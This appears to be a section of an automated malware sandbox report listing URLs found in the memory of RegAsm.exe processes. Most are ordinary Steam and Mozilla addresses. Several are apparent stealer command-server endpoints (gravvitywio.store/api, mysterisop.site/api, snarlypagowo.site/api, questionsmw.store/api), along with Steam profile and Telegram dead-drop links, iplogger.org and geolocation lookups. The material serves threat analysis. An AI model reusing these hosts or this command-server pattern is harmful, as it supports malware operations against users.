Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/Y?P
Source: RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/api
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/apiD
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/i
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store:443/api
Source: RegAsm.exe, 00000024.00000002.2560297063.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store:443/apifiles/76561199724331900
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe	String found in binary or memory: https://ipgeolocation.io/
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/g
Source: 596a8ed0706146e48ded9036d0de8611.exe, 00000003.00000002.1765423290.00000000040D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/
Source: RegAsm.exe, 00000005.00000002.1882907666.0000000003B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1nhuM4.js
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1nhuM4.jssF
Source: RegAsm.exe, 00000005.00000002.1882907666.0000000003B00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org:443/1nhuM4.js
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mysterisop.site/
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mysterisop.site/api
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2560297063.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://questionsmw.store/api
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snarlypagowo.site/
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snarlypagowo.site/api
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/R
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/i
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/i_
Source: RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2117154587.000000000143B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 00000020.00000002.2117154587.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 0000001E.00000002.2538825385.0000000001442000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869H
Source: RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869P
Source: RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869o
Source: 9nou8XrciU9ATc03f2Eu4OO2.exe, 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/q
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
